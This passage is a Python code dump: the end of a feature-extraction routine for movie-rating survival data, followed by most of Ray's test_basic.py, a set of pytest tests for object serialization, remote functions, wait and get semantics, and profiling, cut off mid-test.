movie_director_ds, movie_genre_ds, movie_countries_ds, feature_begin, feature_end)
rate_sparse, attach_sparse, played_by_sparse, directed_by_sparse, has_genre_sparse, produced_in_sparse = parse_dataset(
user_rates_movies_ds,
user_tags_movies_ds, movie_actor_ds, movie_director_ds,
movie_genre_ds,
movie_countries_ds, feature_begin, feature_end, indexer
)
observed_samples, censored_samples = sample_generator(user_rates_movies_ds, observation_begin,
observation_end, rate_sparse, indexer, censoring_ratio)
X, Y, T = extract_features(rate_sparse, attach_sparse, played_by_sparse, directed_by_sparse,
has_genre_sparse, produced_in_sparse, observed_samples, censored_samples)
X_list = [X]
if not single_snapshot:
for t in range(int(feature_end - delta), int(feature_begin), -int(delta)):
rate_sparse, attach_sparse, played_by_sparse, directed_by_sparse, has_genre_sparse, produced_in_sparse = parse_dataset(
user_rates_movies_ds,
user_tags_movies_ds, movie_actor_ds, movie_director_ds,
movie_genre_ds,
movie_countries_ds, feature_begin, t, indexer
)
X, _, _ = extract_features(rate_sparse, attach_sparse, played_by_sparse, directed_by_sparse,
has_genre_sparse, produced_in_sparse, observed_samples, censored_samples)
X_list = [X] + X_list
for i in range(1, len(X_list)):
X_list[i] -= X_list[i - 1]
scaler = MinMaxScaler(copy=False)
for X in X_list:
scaler.fit_transform(X)
X = np.stack(X_list, axis=1) # X.shape = (n_samples, timesteps, n_features)
T /= delta
return X, Y, T
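# Example invocation (illustrative values only; the real driver script is not shown here):
#   X, Y, T = run(delta=3, observation_window=12, n_snapshots=4)
# With single_snapshot=False, X stacks one feature matrix per snapshot (successive
# differences of the meta-path counts, min-max scaled), Y marks observed vs. censored
# pairs, and T is expressed in units of delta.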
test_basic.py
# coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import os
import random
import re
import setproctitle
import shutil
import six
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
import numpy as np
import pickle
import pytest
import ray
import ray.tests.cluster_utils
import ray.tests.utils
from ray.utils import _random_string
logger = logging.getLogger(__name__)
@pytest.fixture
def ray_start():
# Start the Ray processes.
ray.init(num_cpus=1)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_simple_serialization(ray_start):
primitive_objects = [
# Various primitive types.
0,
0.0,
0.9,
1 << 62,
1 << 999,
"a",
string.printable,
"\u262F",
u"hello world",
u"\xff\xfe\x9c\x001\x000\x00",
None,
True,
False,
[],
(),
{},
type,
int,
set(),
# Collections types.
collections.Counter([np.random.randint(0, 10) for _ in range(100)]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: [], [("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
# Numpy dtypes.
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
]
if sys.version_info < (3, 0):
primitive_objects.append(long(0)) # noqa: E501,F821
composite_objects = (
[[obj]
for obj in primitive_objects] + [(obj, )
for obj in primitive_objects] + [{
(): obj
} for obj in primitive_objects])
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in primitive_objects + composite_objects:
new_obj_1 = ray.get(f.remote(obj))
new_obj_2 = ray.get(ray.put(obj))
assert obj == new_obj_1
assert obj == new_obj_2
# TODO(rkn): The numpy dtypes currently come back as regular integers
# or floats.
if type(obj).__module__ != "numpy":
assert type(obj) == type(new_obj_1)
assert type(obj) == type(new_obj_2)
def test_complex_serialization(ray_start):
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently
# np.testing.assert_equal fails because we do not properly
# handle different numerical types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), (
"Objects {} and {} are different.".format(obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), (
"Objects {} and {} are named "
"tuples with different lengths.".format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world",
u"\xff\xfe\x9c\x001\x000\x00", None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{
"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)
},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
]
# Test dataclasses in Python 3.7.
if sys.version_info >= (3, 7):
from dataclasses import make_dataclass
DataClass0 = make_dataclass("DataClass0", [("number", int)])
CUSTOM_OBJECTS.append(DataClass0(number=3))
class CustomClass(object):
def __init__(self, value):
self.value = value
DataClass1 = make_dataclass("DataClass1", [("custom", CustomClass)])
class DataClass2(DataClass1):
@classmethod
def from_custom(cls, data):
custom = CustomClass(data)
return cls(custom)
def __reduce__(self):
return (self.from_custom, (self.custom.value, ))
CUSTOM_OBJECTS.append(DataClass2(custom=CustomClass(43)))
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = ([{
obj: obj
} for obj in PRIMITIVE_OBJECTS if (
obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = (
BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS)
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
assert_equal(obj, ray.get(ray.put(obj)))
def test_ray_recursive_objects(ray_start):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(shutdown_only):
ray.init(num_cpus=1)
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(shutdown_only):
ray.init(num_cpus=2)
# Check that putting an object of a class that has not been explicitly
# registered succeeds.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
class TempClass1(object):
def __init__(self):
self.value = 1
# Test returning custom classes created on workers.
@ray.remote
def g():
class TempClass2(object):
def __init__(self):
self.value = 2
return TempClass1(), TempClass2()
object_1, object_2 = ray.get(g.remote())
assert object_1.value == 1
assert object_2.value == 2
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(shutdown_only):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
ray.init(num_cpus=1)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def test_no_args(ray_start):
@ray.remote
def no_op():
pass
ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert np.alltrue(ray.get(h.remote()) == np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=1, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(
args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_get_multiple(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(shutdown_only):
ray.init(num_cpus=1)
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(shutdown_only):
ray.init(num_cpus=1)
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
def f():
with ray.profile(
"custom_event",
extra_data={"name": "custom name"}) as ray_prof:
ray_prof.set_attribute("key", "value")
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
if time.time() - start_time > timeout_seconds:
raise Exception("Timed out while waiting for information in "
"profile table.")
profile_data = ray.global_state.chrome_tracing_dump()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
@pytest.fixture()
def ray_start_cluster():
cluster = ray.tests.cluster_utils.Cluster()
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.global_state.chrome_tracing_object_transfer_dump()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(shutdown_only):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
ray.init(num_cpus=1)
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(shutdown_only):
ray.init(num_cpus=1)
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
# TODO(hchen): This test currently doesn't work in Python 2. This is likely
# because plasma client isn't thread-safe. This needs to be fixed from the
# Arrow side. See #4107 for relevant discussions.
@pytest.mark.skipif(six.PY2, reason="Doesn't work in Python 2.")
def test_multithreading(shutdown_only):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
ray.init(num_cpus=2)
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
